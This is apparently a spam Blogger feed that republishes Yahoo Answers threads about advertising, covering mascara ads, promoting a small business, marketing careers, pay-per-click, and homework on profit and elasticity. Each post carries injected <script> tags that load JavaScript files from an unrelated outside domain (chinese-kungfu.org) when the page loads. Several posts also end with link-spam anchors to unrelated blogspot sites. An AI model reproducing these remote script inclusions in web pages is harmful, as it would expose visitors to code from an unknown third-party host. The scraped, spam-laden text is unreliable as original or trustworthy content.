tag:blogger.com,1999:blog-16165157337386586312024-02-20T00:32:04.363-08:00advertisingGiricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.comBlogger260125tag:blogger.com,1999:blog-1616515733738658631.post-8034708697864424232010-04-17T00:40:00.001-07:002010-04-17T00:40:21.919-07:00Mascara Commercials Falsely Advertising?Why do the show models on mascara commercials wearing false eyelashes? Shouldn't it be false advertising since they're insinuating that if we use their mascara our eyelashes will look like that? Gah that's been bugging me! lol<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>Mascara Commercials Falsely Advertising?<br>I fully agree agree on that one!! I continuously see this foundation (and makeup)-packed, puckered-up model with the 2-hour worked-on perfect hair swivel around in the light that makes her look her best and then... false eyelashes galore!! Big, curly black things... I mean, do they really believe that WE'RE going believe that? Maybe some naive 12 year old kid, but geez... I feel truly offended! And profoundly annoyed.....<br>Reply:Remember it's just advertising.<br><br /><br />What about all the fashion models advertising clothes, I don't look anything like them wearing similar clothes!<br>Reply:i some how agree but the do seem false but i dont think they are.<br><br /><br />I know some people even me who could get those same results, just it takes time<br>Reply:Actually, most of the time they don't even use false lashes, but they spend hours tediously coating every single eyelash and separating them and making them look as long as possible so that they appear fake, but in reality they are not, but still no woman on earth would ever spend that long on their lashes so the only way they could look like that would be with falsies.<br><br /><br />I'm sure they use models that have ridiculously long lashes to begin with, as well!<br>Reply:Perhaps they're not wearing false eyelashes. Did you tug on them and find them to be false?<br><br /><br /><br><br /><br /> :-)~<br>Reply:argeein with ya x<br>Reply:yeah..u r right!!<br>Reply:mine always look like the tv ads when i put it on!! it all depends on your eyelashes to start with!! mine are long and thick so I dont have any problems!! but if you have small short lashes - there is no way they will look full and long!!<br>Reply:Don't they still make Mascara out of Guano?<br><br /><br />Who wants that in their eyes anyways.<br><br /><br />I don't know if what they re doing in their ads constitutes false advertising.<br>Reply:Yes, advertisment helps them promote sales. All they really want is profit from customers who are willing to believe that yes you can make your eyelashes 300% longer and thicker with their mascara. LOL<br>Reply:No. Since we all know they are wearing falsies, and we see what the mascara does to falsies, what they are selling is what the mascara does to falsies. Now, if you couldn't get the same results with falsies and the mascara that would be false advertising.<br>Reply:Yeah,I noticed that too and it is false advertisment.<br>Reply:They want money the way doesn't matter<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-76007633497041940072010-04-17T00:40:00.000-07:002010-04-17T00:40:05.628-07:00Any ideas for advertising an on-line greeting business card company in the UK?Im looking for free/ cheap ways of advertising my business, www.withhugsandkisses.biz. We sell handmade, contemporary and traditional greeting cards, if anyone has any ideas<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>Any ideas for advertising an on-line greeting business card company in the UK?<br>10 low cost ways to promote your website<br><br /><br /><br><br /><br />1) add your site to as many search engine listings as you can find, ie http://uk.search.yahoo.com/info/submit<br><br /><br /><br><br /><br />2) make sure you add meta tags to your website (key words which you list then when people search for those keywords your site will come up in the results) - all part of SEO (search engine optimisation)<br><br /><br /><br><br /><br />3) put your website address on all your business stationary - letterheads, invoices, compliments slips, delivery slips, envelopes, parcel packaging, business cards etc etc<br><br /><br /><br><br /><br />4) promote your website by adding it to your email signature on both business and personal emails<br><br /><br /><br><br /><br />5) join as many social networking sites as you can ie hi5, bebo, tagged, facebook, myspace, yahoo 360 etc and add your web address in your profile or notice boards etc<br><br /><br /><br><br /><br />6) add yourself to online directories who give free listings ie http://www.yelldirect.com/freelisting/ho...<br><br /><br /> <br><br /><br />7) get some stickers made for your car, and window stickers made for car windows of friends, family, customers etc<br><br /><br /><br><br /><br />8) PR is always a good move, ask your local paper(s) to run a feature, get your business start-up story on business sites like http://www.newbiztips.net/startupstories...<br><br /><br /><br><br /><br />9) use http://www.vistaprint.co.uk/vp/ns/defaul... to get some free/low cost marketing materials and leave them everywhere you go - cafes, train stations, libraries, school, community centres, college<br><br /><br /><br><br /><br />10) word of mouth is a great way to promote something - and it's free! tell everyone you know and get them to tell people they know<br>Reply:I don't know how much Facebook charges.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-19310934119648443942010-04-17T00:39:00.003-07:002010-04-17T00:39:49.921-07:00Homework help on Advertising campaign/slogan/bumper sticker?!?I need homework help. I am supposed to come up with an advertising campaign for the basis of Roman society. So that is basically violence and Christianity. I also need to come up with a slogan and a bumper sticker for this campaign. I DESPERATELY NEED HELP!!!<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>Homework help on Advertising campaign/slogan/bumper sticker?!?<br>I would argue that the basis of roman society was the system that brought clean water to the city, that kept it from becoming a cesspool of death and disease. Pieces of the original system of aquaducts around Rome are still function.<br><br /><br /><br><br /><br />Health, hygiene, happiness, Only in Rome. It's Clean Water, from Public Works Rome.<br><br /><br /><br><br /><br />:)<br>Reply:I will make one for you.<br><br /><br />i will make a slogan and a bumper sticker for you. check it on flickr.com/photos/nicofly tomorrow<br><br /><br />look in my portfolio.. I promise you that..<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><a href=http://big-teeth2.blogspot.com/>big teeth</a>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-56098047539872563202010-04-17T00:39:00.002-07:002010-04-17T00:39:34.182-07:00Can you go from graphic design/advertising to the business side of it?I am a junior/senior majoring in graphic design/ advertising. I have found that I am not much interested in the handson computer designing aspect. I am interested in the big picture, coming up with the concept not actually making it. If I minor in marketing do you think I could get a job in advertising/marketing on the business side rather than the art side? Thanks to people with experience or knowledge<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>Can you go from graphic design/advertising to the business side of it?<br>Worked in marketing/finance/HR since 2002.<br><br /><br /><br><br /><br />The only thing you truly need is a degree. Any degree. <br><br /><br /><br><br /><br />A basic knowledge of accounting/marketing is helpful if you want to get on the business end. So take accounting 101, intro to macro, and intro to micro at least would help.<br><br /><br /><br><br /><br />Finance/econ/management majors + MBAs do get their foot in the door easier on the business end, but they aren't the only ones.<br><br /><br /><br><br /><br />As long as you have a degree you can get into any job really. You could graduate as an Asian Studies major and have gotten an entry level job with me as long as you had some specific knowledge of the business or how a business runs in general or have specific computer skills or just the fact that we were hiring and you interviewed well.<br><br /><br /><br><br /><br />I'd suggest checking your school's resources for an internship for at least in-between semesters or summer to see what you might need to do in the specific field you want to be in. If that's not possible, just get your degree and pound the pavement from there. And if you aren't qualified to get the job you want, go back to school and get qualified.<br><br /><br /><br><br /><br />But for the most part, I've found any degree can get your foot in the door, at least entry level. What you do after that is your problem.<br>Reply:Well, why not ask someone already in advertising/marketing on the business side !<br>Reply:uhh, i dunno but just for quiriosity, what software do u use for graphiuc design. Adobe illustrator?<br>Reply:You can, although you may find you really need an MBA. I would recommend against majoring or minoring in marketing or advertising (your graphic design program is good just concentrate on the art part); you'll learn all they would teach in the first six months on the job. You do need some marketing, economics and math in preparation for B-school. Be sure to be making presentations in your classes, or take a speech class. A marketing career without an MBA is not promising. However, an MBA combined with a art background would be very interesting to ad agencies.<br>Reply:Definitely minor in Advertising or Communications. It will certainly help you! Also, if your school requires internships (or even if not) try to focus on either of those. It would be very beneficial for you to understand the design part of the process so you'll be very attractive to employers...good luck!<br><br /><br /><br><br /><br />FYI to one of your posters...I took plenty of marketing/advertising classes in order to get a BFA in Graphic Design. We know about the "big picture."<br>Reply:Yes, absolutely. I went from selling advertising, to writing copy and coming up with ideas for promos to now starting my own marketing firm.<br>Reply:YES! Unfortunately, creative designer types are usually horrible at looking at the "big picture". If you have skills in both, you can be very successful, just make sure to take enough classes to support the business aspect of marketing also. Marketing, communications, econ etc.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-85154433452677707622010-04-17T00:39:00.001-07:002010-04-17T00:39:17.717-07:00A model for advertising response is given by:where P (a) is the profit expressed as a function of the amountP(a)=200-2a+10 ln a<br><br /><br />optimal amount of advertising, a = <br><br /><br />maximum profit, P =<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>A model for advertising response is given by:where P (a) is the profit expressed as a function of the amount<br>P(a) = 200 -2a + 10ln(a)<br><br /><br /><br><br /><br />maximum profit is when dP/da = 0<br><br /><br /><br><br /><br />dP/da = -2 + 10/a<br><br /><br /><br><br /><br />so -2 + 10/a = 0<br><br /><br /><br><br /><br />10/a = 2<br><br /><br /><br><br /><br />2a = 10<br><br /><br /><br><br /><br />a = 5<br><br /><br /><br><br /><br />calculate P when a = 5<br><br /><br /><br><br /><br />P(5) = 200 - 2(5) + 10ln(5)<br><br /><br /><br><br /><br />=%26gt;200-10 + 10(1.609)<br><br /><br /><br><br /><br />P(a) = 206.09<br><br /><br /><br><br /><br />so optimal amount of advertising a = 5 and <br><br /><br /><br><br /><br />Maximum profit, P = 206<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-63335678375516446012010-04-17T00:39:00.000-07:002010-04-17T00:39:01.754-07:00Starting salary in advertising?How much can I start off making in either marketing or advertising or even public relations?<br><br /><br />My Bachelors is in Business Marketing.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>Starting salary in advertising?<br>The salary/remuneration for a particular job is the market value for a particular profession and designation at the city/town where the office is located. Job postings at websites like Monster, Yahoo HotJobs and Careerbuilder carry information about salaries. The Govt Dept of Labor, (www.bls.gov) Bureau of statistics has information about median salaries for different professions and details of additional compensation offered. Other online resources are salary.com and payscale. Your salary will also depend on your educational qualification and how you handle your career. More details and links to relevant websites available at http://7ys.info/<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-24680990428580405972010-04-17T00:38:00.002-07:002010-04-17T00:38:46.199-07:00How does internet advertising work? pay for clicks?what is the difference between google and yahoo advertising products? is there another option?<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>How does internet advertising work? pay for clicks?<br>We used to spend a lot at Overture (which is now Yahoo) but we get much more bang for the buck at Google. Sign up at Google and pay per click, depending on the keywords you want...it should pay off. Overture/Yahoo is much more expensive because their minimum bid is 10 cents. At Google, that keyword you want may only be 5 cents. There are lots of other pay-per-click advertising sites available, but you only need to stick to Yahoo and/or Google. Those are the two that will really convert.<br>Reply:check out http://www.merchantcircle.com<br><br /><br /><br><br /><br />They're not a Pay per Click advertiser but they do help small businesses by providing ways to advertise and build community involvement through referrals and endorsements.<br><br /><br /><br><br /><br />I hope this helps.<br>Reply:Pay only if your ad gets click.then you will be ask your maximum bid per click is and then will charge you only the minimum that is necessary.<br>Reply:I don't think its by clicks! Advertising is just as it is. A company is posted on the yahoo/google what have you pages. Someone will see their advertisement and respond to it however they want. It's like an ad on a billboard on a highway its just there. Exposure you see it and that's all that counts. Some companies pay more so when you search for something their homepage shows up first!<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><a href=http://teeth-hurt.blogspot.com/>teeth hurt</a>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-30235306163167027722010-04-17T00:38:00.001-07:002010-04-17T00:38:29.804-07:00Yahoo Groups without Advertising?Are there paid Yahoo Groups available that do not have the advertising?<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>Yahoo Groups without Advertising?<br>As far as I know ALL Yahoo Groups are free, and there is no paid groups.<br>Reply:No, there are no paid Y! groups. Advertising on Groups is what makes Yahoo Groups free for all of us.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-17830469913354578262010-04-17T00:38:00.000-07:002010-04-17T00:38:13.731-07:00What is the name of my advertising Company.?We start a Advertising Company. Its responsibility is flex printing in door and out advertising and billboard supply .<br><br /><br />Please tell me its good name and its meaning. <br><br /><br />Thanks<br><br /><br />my Email address is aabrarhussain@yahoo.com<br><br /><br />Thanks<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>What is the name of my advertising Company.?<br>"Buraak International Advertising", <br><br /><br />or "Buraak Advertising Agency".<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-74120808672542471652010-04-17T00:37:00.003-07:002010-04-17T00:37:57.789-07:00What constitutes Soliciting/Advertising?I had an answer removed. Someone asked for a good free work at home. I responded and YA took my answer off and sent me a violation notice. Since the person asked...my answer can't possibly be considered soliciting or advertising can it?<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>What constitutes Soliciting/Advertising?<br>Well, yes, obviously it could be. That is why they deleted it. You could tell the person HOW to find a site like that, or possibly post SEVERAL of those types of site, but just posting one like that, with no disclaimer, reads like advertising.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-56812681493710887742010-04-17T00:37:00.002-07:002010-04-17T00:37:41.712-07:00Sue company false advertising?i used to work for a company that was an SEO (search engine optimization) the company had all of us telemarketers call random businesses all over the USA telling them if they signed up for our service we would be able to put them in the showcase position on yahoo and google. (((showcase means when you search on yahoo or google and your looking for a business... lets say a pet groomer...you would type in "pet groomer" and the first 3 listings you see are the showcase positions))) now what they really did was barely put them in the yahoo and google database where maybe if you went to page 4 or 5 you would see them....crazy huh? ya well i was wondering how i could get them in trouble to stop them from lying! could i sue them for false advertising? what is your opinion?<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>Sue company false advertising?<br>IF and a big IF you could get all of the old clients together to file a class action suit then they may be able to collect damages, but you would collect nothing seeing as how you were not harmed by t his in any way. So you would put a lot of time and effort in to just get to revenge on them, keep in mind though that it may be awkward for you to talk to the clients considering you were one of the ones that called around and ask them to sign up. I would just let it go. It's wrong that they did it, but trying to punish them will just make you miserable. You should however report them, so that they can not continue this practice. You can got to the Chamber of Commerce or the Better Business Bureau to see if there is anything they can do to shut them down. Good Luck.<br>Reply:No, you cannot personally sue them because you have not suffered any injury from their practices. However, you CAN file a complaint with your local Chamber of Commerce and Better Business Bureau.<br>Reply:You could report them to the attorney general. That's really about all you have, however a class action suit sounds in order for your previous clientele.<br>Reply:You can only sue someone if you are the injured party.<br>Reply:Not if you were, how shall i put this, unceremoniously discharged. Fired employees cannot sue their employee on the grounds of false advertising as the courts consider it a "vengeful allegation."<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><a href=http://teeth-braces2.blogspot.com/>teeth braces</a>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-28654162644122740572010-04-17T00:37:00.001-07:002010-04-17T00:37:25.542-07:00How do I get adult magazine advertising rates?Does anyone know where I can get advertising rates for magazines like Hustler, Chic, Gallery, Leg Show, etc? I know I can buy the magazine and write in, but I'd like to do it via the Internet. Anyone know a web site or email address? Before anyone suggests it, I have been to the respective web sites and have not found any info on print advertising.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>How do I get adult magazine advertising rates?<br>visit http://net-new.blogspot.com and search for <br><br /><br />also try http://netnew.spaces.live.com/<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-55947536982346209212010-04-17T00:37:00.000-07:002010-04-17T00:37:11.347-07:00What is the advertising elasticity of demand for good x?Suppose demand is given by<br><br /><br /> Q xd = 50 - 4Px + 6Py + Ax , <br><br /><br />where Px = $4,<br><br /><br /> Py = $2, and <br><br /><br />Ax = $50. <br><br /><br /><br><br /><br /><br><br /><br />What is the advertising elasticity of demand for good x?<br><br /><br />a) 1.12.<br><br /><br />b) 0.38.<br><br /><br />c) 1.92.<br><br /><br />d) 0.52.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>What is the advertising elasticity of demand for good x?<br>d) .52<br><br /><br /><br><br /><br />Elasticity of demand, put simply, is how we react to changes in prices. Typically, if the product is needed, then the demand is inelastic, and we are not affected by price changes. Other times we have more sensitivity to changes in prices and demand is more elastic.<br><br /><br /><br><br /><br />You can measure demand elasticity by dividing the change of demand by the change in price, or delta Qxd/delta Ax. In this example, just solve for Qxd with Ax of $50 and again for, say, $100.<br><br /><br />Note: (1) and (2) are usually written as subscripts.<br><br /><br /><br><br /><br />Axd(1)=50<br><br /><br />Axd(2)=100<br><br /><br />Qxd(1)=50-4(4)+6(2)+50=96<br><br /><br />Qxd(2)=50-4(4)+6(2)+100=146<br><br /><br /><br><br /><br />delta Qxd=(Qxd(1)-Qxd(2))/Qxd(1)<br><br /><br />delta Ax=(Ax(1)-Ax(2))/Ax(1)<br><br /><br /><br><br /><br />delta Qxd/delta Ax<br><br /><br /><br><br /><br />(96-146)/96<br><br /><br />--------------- = .0520833<br><br /><br />(50-100)/50<br>Reply:$15<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-27352212759540141532010-04-17T00:36:00.003-07:002010-04-17T00:36:54.605-07:00If Priceline is advertising "Ho! Ho! Hotels: Save Up to Half-Off", is it offensive language?This is the actual subject line on the e-mail message.<br><br /><br /><br><br /><br />What kind of "hotels" are they advertising? Ho, ho ho!<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>If Priceline is advertising "Ho! Ho! Hotels: Save Up to Half-Off", is it offensive language?<br>You will have whacked the noses of the visioneers of the obvious with this one.<br><br /><br /><br><br /><br />The halves will demonstrate tomorrow and engage in an email campaign. The hos are bringing poinsettias. The Ho-teliers Union will check their bankroll and try to rent the poinsettias<br>Reply:l don't find it offensive. <br><br /><br />l find it silly.<br>Reply:Too much politically correct BS. I don't find it offensive in the least! Funny, but not offensive.<br>Reply:I think the whole politically correct thing has gotten way out of hand! When does a laugh "Ho Ho Ho" which has been around for centuries get mixed with slang that has been created in the last maybe 10 years. Paaaleeese!<br>Reply:I think you are over reacting. since christmas time is comming everyone is advertising about it . HO HO HO is Santa's laughter, EVERYONE knows that and if you thought otherwise you are the one with the offensive thoughts<br>Reply:No. It's Christmas Time. Santa says ho ho ho. Leave Santa alone! :)<br>Reply:No, it is not, so WTF, people...<br><br /><br />Does anyone read old christmas literature?!<br>Reply:No, it's not offensive at all.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-39628924425909980072010-04-17T00:36:00.002-07:002010-04-17T00:36:38.476-07:00Job interview for advertising company?i have applied for an internship with a well known advertising agency in my city. they say the interview will take the form of a presentation. can anyone offer any ideas on what to do or how this works? i know they are also going to ask me about my reasons for being in this field and will ask about my favourite ads as they have informed me about this. should i come up with an ad campaign selling myself to them, and if so, can anyone help in terms of how i could go about doing this and make it fun/exciting/interesting? thank you so much, your input will be highly valued and i will thank all of you if i get this internship!<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>Job interview for advertising company?<br>dude, if you can not come up with that stuff on your own then you have no business working at an ad agency. The entire point of them asking you to interview in this way is to see how creative you are. You can not apply to a creative position and then try to get other people to be creative for you.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><a href=http://cat-teeth.blogspot.com/>cat teeth</a>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-11567897560253278962010-04-17T00:36:00.001-07:002010-04-17T00:36:21.665-07:00How many states have anti-smoking advertising campaigns?I am trying to determine how many states have anti-smoking advertising campaigns -- and in particular those targeting teens. I am also hoping to find sample ads and the names of those advertising agencies behind the work. Thank you.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>How many states have anti-smoking advertising campaigns?<br>i think all states have anti-somking ads phillip-morris has one and truth.com is the biggest one i know of. you can always go to google and type anti-smoking campaigns. i also know that truth.com targets mostly teens<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-68196983961561221932010-04-17T00:36:00.000-07:002010-04-17T00:36:05.873-07:00Mislead by TV advertising,what do you think?I bought a cornetto the other day,two bites in and I still wasnt in<br><br /><br />venice sitting on a gondola.<br><br /><br /><br><br /><br />I bought my girlfriend some of that new Dior scent,she put it on<br><br /><br />went out and when she came back,she didnt look anything like<br><br /><br />Charlize Theron<br><br /><br /><br><br /><br />Isnt this just another example of false advertising?<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>Mislead by TV advertising,what do you think?<br>Hi Pablo, I agree with you 100%. I have been so tempted in the past to write and complain to the TV companies, about their false advertising, especially with regards to HP Sauce, I have bought so many bottles and not one of them has made me " A Bacon Sandwich " so far. !! xx<br>Reply:Yup bought my partner some of that new L'oreal for men moisturiser... still looks like sh*t<br>Reply:Yes..... Cillit Bang.... BANG... and the dirt is still sodding there!!!!<br>Reply:I quite agree......apart from Herbal Essence's.......Lol<br>Reply:i know what you mean, i bought a can of red bull the other day and still didnt get any wings.<br>Reply:Know the feeling well pal.Applied for one of them crunchy nut lane passes.Kelloggs wrote me a nice reply back,but reading between the lines i think they think i am stupid.How was i to know it was just a stunt?Eating Shredded Wheats now,stuff Kelloggs.<br>Reply:I went to dixons and bought a computer got connected to the world wide web so that i could explore the world and have fantastic new adventures, And still i find myself sitting here answering questions like this, Where is the justice ???<br>Reply:very much mislead<br>Reply:Of course, that's what media's for. But you bought their product didn't ya?<br>Reply:I know what you mean. Chanel No 5 doesn't make me look ANYTHING like Nicole Kidman. I want my money back.<br>Reply:i know right, i had to have this converstion with my 4 year old niece on why the box lied to her and said that there was a phone in her lunch able. she was pissed. but why? its says ont the box see,see the phone i just want the phone, why isn't in the box like that lil' boy has how come please i want the phone. I WANT THE PHONE! then the tears. after that the fit. omg! finally i just threw it away it was nap time! i love nap time.<br>Reply:Advertising is designed to appeal to peoples emotions and feelings. One shouldn't expect ads to convey much in the way of facts. This is especially true of political ads. They get you to buy things or support causes by appealing to your irrational and emotional side, and most of the time with most people, it works.<br>Reply:Yes it is. I eat my Special K cereal, but look nothing like the skinny woman lounging at the side of the pool. MUCKY...don't even get me started on that sodding Cillit Bang. I agree that it's a waste of money and false advertising<br>Reply:I know i bought 3 litres of lynx and girls have never chased me up the road<br>Reply:I'll say. Just the other day, I popped open a bottle of beer, but I wasn't instantly surrounded by hot, bikinni clad chicks.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-19662293264499633822010-04-17T00:35:00.003-07:002010-04-17T00:35:49.535-07:00Is anyone else upset about the advertising yahoo puts in the middle of your homepage?Yahoo (or ATT) has added this little square of advertising in the middle of the homepage. They don't allow you to get rid of it. Now they are saying they will also add advertising to your e-mail page. Is anyone upset about this?<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>Is anyone else upset about the advertising yahoo puts in the middle of your homepage?<br>Not really, it's their web site and it's not like your paying anything.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-73201144131623661562010-04-17T00:35:00.002-07:002010-04-17T00:35:33.546-07:00Name of the advertising agency that did Jaguar's recent commercial.?Which advertising agency did this commercial?<br><br /><br />http://video.google.com/videoplay?docid=...<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>Name of the advertising agency that did Jaguar's recent commercial.?<br>On March 23, 2005 Jaguar announced Fuel (an offshoot of Euro RSCG) as it's "new worldwide advertising agency".<br><br /><br /><br><br /><br />http://www.signonsandiego.com/uniontrib/...<br>Reply:Euro RSCG is responsible for this drivel.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><a href=http://horse-teeth.blogspot.com/>horse teeth</a>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-85023535085264758052010-04-17T00:35:00.001-07:002010-04-17T00:35:18.635-07:00Freelance webdesign service advertising?I'm a freelance web designer looking for some ways of advertising my services. I don't have my own website, so usually I show people the projects I've done recently. And I'm looking something like craigslist's free ads or any effective ways to attract people's attention.<br><br /><br /><br><br /><br />Could you give me a piece of advice or some links?<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>Freelance webdesign service advertising?<br>I own a graphic design firm, and regularly use freelance folks. I cannot imagine hiring a freelance web designer who did not have at least some sort of minimal web site. <br><br /><br /><br><br /><br />I've also hired off Craig's list. It's a cheap place to advertise, but you get tons and tons of responses that you have to blast through at high speed just to get through them all. A web site (or at least a link to a portfolio oriented web service) is essential. <br><br /><br /><br><br /><br />Sorry, but when you tell me you're a web guy with no web site... that just sounds to me like you're not yet serious about what you're doing. <br><br /><br /><br><br /><br />Nothing personal,<br><br /><br />Rex<br>Reply:try this one too<br><br /><br />http://beta.bitwine.com/signup...<br><br /><br />it's free to join <span>Report It</span><br /> <br>Reply:If you are an Indian programmer, graphic designers, content writers, seo experts, etc you can try out this exclusive Indian freelance site. Signing up is not only Free but also receive 25 Rs with free tools and e-books. Find outsourced work here http://www.e-guru.in <span>Report It</span><br /> <br>Reply:Here is a simple answer Guru.com<br>Reply:Design your own website! The most effective way to show that having a website is a great marketing tool is to use your own! Create a brand and a style that suits you. Keep it simple, clean and professional. Don't show off every code or every flash you can do - just put forth your most promising look.<br><br /><br /><br><br /><br />Also, word of mouth is the hottest way to build a business. Join a networking group like http://www.bni.com or your local chamber of commerce and start working the room. Get a few books on how to be a successful networker and learn the way to network successfully.<br><br /><br /><br><br /><br />Good luck!!!!!<br>Reply:I just started a small business and this is one of the websites I found. Since you dnt have a website yet I'm assuming you target customers who reside in your area to show them your designs. Well any way this site lets you advertise for free, but only in your area. Of course they have different fees if you u want to expand your horizons. Good Luck.<br>Reply:A few free resources – check out the sources box for links:<br><br /><br /><br><br /><br />1) Create a blog pertaining to your field<br><br /><br /><br><br /><br />2) Use Yahoo! Local %26amp; Yahoo! Groups – Be sure to read the TOS for each one! <br><br /><br /><br><br /><br />3) Write articles pertaining to your field and/or expertise.<br><br /><br /><br><br /><br />I listed a few handy sites %26amp; articles relating to marketing, promotion %26amp; advertising. Here's some book titles that are relevant:<br><br /><br /><br><br /><br />* The Complete Idiot's Guide to Marketing Basics by Sarah White<br><br /><br />* The 22 Immutable Laws of Marketing by Al Ries, Jack Trout<br><br /><br />* Creative Advertising: Ideas and Techniques from the World's Best Campaigns by Mario Pricken<br><br /><br />* Entrepreneur Magazine's Ultimate Small Business Marketing Guide: Over 1500 Great Marketing Tricks That Will Drive Your Business Through the Roof by James Stephenson<br><br /><br />* 301 Do-It-Yourself Marketing Ideas: From America's Most Innovative Small Companies by Sam Decker<br><br /><br /><br><br /><br />Hope that helps! I wish you much success %26amp; happiness in all your ventures!<br>Reply:http://career.classified.ad<br><br /><br />http://career.ads.la<br>Reply:You know web sites not only have to look great but they have to work.<br><br /><br />A piecemeal web site that has no viewer participation or says too much is of no use to anyone.<br><br /><br />Great web sites are the ones that entice the viewer to want to know more through a series of "closes" leading to BUSINESS.<br><br /><br /><br><br /><br />All up web sites that give everything rarely work.<br><br /><br /><br><br /><br />I other thing if I may add. Always welcome the viewer to the site.<br><br /><br /><br><br /><br />Now the fact that you design but haven't managed to attract anyone to your sight, suggests that you are doing something wrong.<br><br /><br />If you want to present your services then get yourself what you are wanting to sell. <br><br /><br />If you want some help with the creative then get in touch with me.<br><br /><br />http://thebaldchemist.blogspot.com By The way always have some elements of fun.<br><br /><br />Take Care.<br><br /><br />The Baldchemist<br>Reply:Go to www.freewebs.com and you can set up a very professional portfolio web-site in minutes....FOR FREE!<br>Reply:- create your own website, on free website (paid is better, choose cheapest package that suits your need, small money anyway but more professional)<br><br /><br /><br><br /><br />- link a blog to your website<br><br /><br /><br><br /><br />- submit your website to most popular search engine, and important to give good "description" about your website, search engine will use words in your "description" as the keywords, read more info about this in the links below<br><br /><br /><br><br /><br />- update your blog often, it will help your blog to be found/submitted in popular search engine. dont forget to place your blog in popular blog website<br><br 